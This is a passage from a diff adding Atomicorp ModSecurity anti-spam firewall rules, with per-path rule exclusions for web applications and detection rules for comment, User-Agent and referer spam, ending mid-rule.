+SecRule REQUEST_FILENAME "/checksitelock\.php" "phase:2,id:95250,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/myaccount/modules/addons/" "phase:2,id:95251,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/processing\.php" "phase:2,id:95252,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/modules/v2_news_engine\.php" "phase:2,id:95253,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/configuressl\.php" "phase:2,id:95254,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/shop/remote\.php" "phase:2,id:95255,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/do_add_new_image\.php" "phase:2,id:95256,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/clients\.php" "phase:2,id:95257,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/acp/" "phase:2,id:95258,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/mailblast\.html" "phase:2,id:95259,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/system/ajax" "phase:2,id:95260,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/edicion1\.php" "phase:2,id:95261,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/moderate\.php" "phase:2,id:95262,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/include\.backendedit\.php" "phase:2,id:95263,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/saveredirect\.html" "phase:2,id:95264,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/redaxo/index\.php" "phase:2,id:95265,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/tools/" "phase:2,id:95266,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/displaycombinations_ajax\.php" "phase:2,id:95267,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/supporttickets\.php" "phase:2,id:95268,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/editmainimage\.php" "phase:2,id:95269,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/skriv/entries" "phase:2,id:95270,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/ajax/_products\.php" "phase:2,id:95271,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/builder/" "phase:2,id:95272,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/control/catalog/" "phase:2,id:95273,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/payonline/" "phase:2,id:95274,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/eecms\.php" "phase:2,id:95275,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/get_messages\.php" "phase:2,id:95276,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300074"
+
+SecRule REQUEST_FILENAME "/cgi-bin/apluspro/scripts/" "phase:2,id:95277,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/amember/login" "phase:2,id:95278,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300057"
+
+SecRule REQUEST_FILENAME "/trackpanel/catalog/product_set/" "phase:2,id:95279,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/getcontractextdetails\.php" "phase:2,id:95280,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/wp-json/tcb/v1/lightspeed/optimize" "phase:2,id:95281,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/editquestion\.php" "phase:2,id:95282,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/v2c/json/fr\.template\.save/" "phase:2,id:95283,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300076"
+
+SecRule REQUEST_FILENAME "/csm/bp_event/webbuchung/mailer/mailer_sendmail\.php" "phase:2,id:95284,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300076"
+
+SecRule REQUEST_FILENAME "/content-manager/collection-types/" "phase:2,id:95285,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Anti Spam rules
+#
+# Copyright 2005 - 2024 Atomicorp, Inc. All rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+# Phase 2 rules
+
+
+#Skip these rules if its not a POST or GET
+SecRule REQUEST_METHOD "!(?:GET|POST)" "id:370111,phase:2,t:none,skipAfter:END_SPAM,nolog,noauditlog,pass"
+
+#Search engines dont post
+#Googlebot|MSNBot|BingBot
+SecRule REQUEST_URI "/wp-comments-post\.php" "chain,phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:323299,rev:1,severity:3,msg:'Atomicorp.com WAF AntiSpam Rules: Spammer attempting to post to WP comments as fake search engine',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+SecRule REQUEST_HEADERS:User-Agent "(?:Googlebot|MSNBot|BingBot)" "t:none"
+
+#UA spam
+#User-Agent: Opera/9.80 <a href="http://www.youtube.com/watch?v=wAnBXRtU9Qg">how to treat hemorrhoids</a> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60
+#<a href="
+SecRule REQUEST_HEADERS:User-Agent "< ?a href ?=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:303299,rev:1,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Link Spam in User-Agent header',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+#Known spam/worm sign
+SecRule &REQUEST_HEADERS:Gyoarazujo "@eq 1" "phase:2,deny,log,auditlog,status:403,t:none,id:313299,rev:1,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Known worm sign'"
+
+#Trusted IPs
+#173.0.81.0/24 paypal
+#SecRule REMOTE_HOST "@ipmatch 173.0.81.0/24" #       "phase:2,t:none,pass,nolog,id:355897,skipAfter:END_SPAM"
+
+#Skip SPAM rules if this is a not something to check for spam, like control panels, ASL gui, etc.
+SecRule SERVER_PORT "^(?:844[3-5]|30000)$" "phase:2,id:333721,pass,t:none,nolog,noauditlog,skipAfter:END_SPAM"
+
+#Skip SPAM rules if this is a not something to check for spam, like graphics, videos, CSS, ico, docs, etc.
+SecRule REQUEST_FILENAME "\.te?xt$" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:333896,skipAfter:END_SPAM"
+SecRule TX:STATIC "@eq 1" 	"phase:2,id:'363897',pass,t:none,nolog,noauditlog,skipAfter:END_SPAM"
+
+
+#Concrete 5 editing bypass
+SecRule ARGS:ccm-edit-block-submit "^submit$"         "phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,id:333897,skipAfter:END_SPAM"
+
+#Concrete 5 editing bypass
+SecRule ARGS:selected "^News$"         "phase:2,t:none,pass,nolog,noauditlog,id:353897,skipAfter:END_SPAM"
+
+#Skip SPAM rules for admin applications and the like
+#/?_task=mail
+SecRule REQUEST_URI "(?:/(?:(?:i(?:nclude\.php?path=forum/editpost|mp/compose)|pr(?:o(?:duct_thumb|file)|eview_static_cgi)|callback|diagnostics|editsection|tickets)\.php|system/index\.php?s=.*c=(?:publish|edit)&m=new_entry$|workshops/register\.php|link(?:machine/linkmachine\.php|s/\?act=addsite)|(?:\?modulo=loja&action|update\.php?pageid)=|nav\.php\?nav=(?:moderate|addnews)|cgi-bin/mailinglist/mail\.cgi)|/(?:(?:s(?:itebuilder|hopadmin)|cms/(?:resources/edit|save/key)|hspc/pcc|node/add|vsadmin)/|w(?:p-(?:content/plugins|admin)/|izard/edit/html)|adm(?:in(?:istrator/)?|/))|\?(?:(?:p=admin_cms|task=(?:edit|addressbook)|tab=admin[a-z]+)&|action=admin)|node/[0-9]+/edit|^/\?[sv]=|\?q=ckeditor|/comment/reply/[0-9]+|/(?:new|edit)/[0-9]+/confirm|/index\.php(?:\?(?:option=com_j(?:reviews|events|easyblog)|tmpl=component|dispatch=)|/blog_admin/manage_blog)/|/calendar/index\.php\?act=calendar&code=addnewevent|/index\.php\?(?:view=article&id=.*&task=edit|p=admin)|/page/edit/\?id=[0-9]+|(?:/(?:(?:m(?:embers/editing|ickadmincp|anager?)|c(?:ontrol_panel|ar_admin|heckout|ms)|p(?:(?:hpmy|a)admin|lugins/payment)|b(?:uild/connectors|ackoffice)|s(?:(?:ecu|to)re|ite-?admin)|adm(?:in(?:istrator|cp)?)?|_admin(?:panel)?|ndxz-?studio|file/ajax|rm-tools|wp-admin|order)/|i(?:n(?:dex.php/(?:mail/composemessage/|component/resman)|stall)|mp/))|admin.(?:p(?:hp|l)|cgi)|(?:message|ipn)\.php)|/catalogsearch/|(?:update(?:case|event)|edit_producto?|wp-load|/inc/go)\.php|/[a-z]+?admin[0-9]+?/|^/livehelpnew/agent/|^/page/submit-news|^\?q=node|^/wbb/acp/index\.php\?form=|^/webmail/|^/adm\?|^/za/zcadm|^/cp/index\.cgi|^/nieuwsbrief/index\.php\?c=template|^/upload/|^/elements/save/|^/articles/update|^/posts?/edit|^/clients/clientarea|/cms_block/save/|^/[a-z0-9\./]+/saml/sso|^/typo?/mod\.php|^/connectors/(?:element|resource)/|^/[a-z]+/[a-z]+/(?:add|edit)/[0-9]+|^/eprocservice/supplierinboundservice|^/index\.php\?module=calendar|^/([a-z]+/)?(?:c?admin|whmadmcp)|^/\?_task=mail|^/ajax/api/editor/|^/services/bmcontent\.json|^/sitelogin/index\.php\?route=catalog|^/publish/index\.php|ipnhandler\.php|paypal/ipn|^/backend/|^/client/vacancies/|^/typo3/index\.php\?route=/rte/wizard/|^/\?option=com_easyblog|^/app/index\.php/zurmo/|^/\?fl_builder|^/sitemgr/|^/index\.php/[a-z]+admin/cms_page/|^/orders|^/sogo/|^/[a-z0-9]+/index\.php\?route=catalog/product/update|^/active-campaign/|^/\?et_pb_preview=|^/services/bmwidget\.json)" "phase:2,id:333898,rev:5,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:END_SPAM"
+
+
+SecRule REQUEST_URI "!(?:/imp/compose\.php|/node/(([0-9]+)/edit|add/news-story)|^/news/add$|/profile\.php)" 	"phase:2,deny,log,auditlog,status:403,chain,id:300134,t:none,t:urlDecodeUni,t:lowercase,rev:2,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Potential Referer Spam',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+SecRule REQUEST_HEADERS:Referer "!@pmFromFile domain-spam-whitelist.txt" "chain,t:none,t:lowercase"
+SecRule  REQUEST_HEADERS:Referer "@pmFromFile domain-blacklist.txt"  "t:none,t:lowercase"
+
+############ SPAMMY URLS ########################
+#
+SecRule ARGS "@pm http:// https:// ftp:// ftps:// @"         "id:333899,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:343722,t:none,pass,nolog,noauditlog,skipAfter:END_SPAMMY_URLS"
+
+#Broken spamtool
+SecRule ARGS:name "^http://www\.[a-z]+," 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:303201,rev:1,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam Tool detected',logdata:'%{TX.2}'"
+
+# Rule 300001: Blacklist of URI and email sign up spam
+SecRule ARGS "(?:(?:ht|f)tps?:/|[a-z0-9._%+-]+@[a-z0-9.-]+)"  	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:300001,rev:24,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Abusive or Spam Domain detected in argument',chain,logdata:'%{TX.2}'"
+SecRule ARGS "!@pmFromFile domain-spam-whitelist.txt" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
+SecRule ARGS|!ARGS:gltr_page_content|!ARGS:/admin/|!ARGS:/censor/|!ARGS:block "@pmFromFile domain-blacklist.txt" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
+
+#
+#SecRule REQUEST_HEADERS:Referer "!@pmFromFile domain-spam-whitelist.txt" #	"chain,id:300000,rev:3,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Blacklist Referer Spam',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+#SecRule REQUEST_HEADERS:Referer "@pmFromFile domain-blacklist.txt"
+
+# Rule 300034:
+# Spammers posting spam into blog/forum software temp & cache
+#SecRule ARGS|!ARGS:/comment/|!ARGS:loc|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:msg_body|!ARGS:/text/|!ARGS:/txt/|!ARGS:Post|!ARGS:link_href|!ARGS:src|!ARGS:message|!ARGS:/department/|!ARGS:/reply/|!ARGS:filename|!ARGS:/url/|!ARGS:/saml/|!ARGS:/dnssearch/|!ARGS:file|!ARGS:/token/ "http://.*[a-z0-9]{2,}\.[a-z]{2,}(?:(/blog)?/wp-content(?:/uploads/|themes|gallery)/|/blogs?/templates/)" #        "phase:2,deny,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:300034,rev:19,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam or Malware: URL to temporary directory',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+#SecRule REQUEST_URI "!(casetracker)"
+
+# Rule 300052:
+#SecRule ARGS "href.*http.*\{@\domain}\.*\{\@url\}.*\{\@anchor\}"  #        "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:300052,rev:2,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Broken spambot',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+# Rule 300054: Comment Spam
+#SecRule ARGS|!ARGS:/email/|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:description|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:/url/|!ARGS:/saml/|!ARGS:/dnssearch/|!ARGS:file|!ARGS:/token/|!ARGS:/web/|!ARGS:/host/ "(?:ht|f)tps?://.*[0-9]{7,}(web\.)?\.(?:com|net|org)"  #        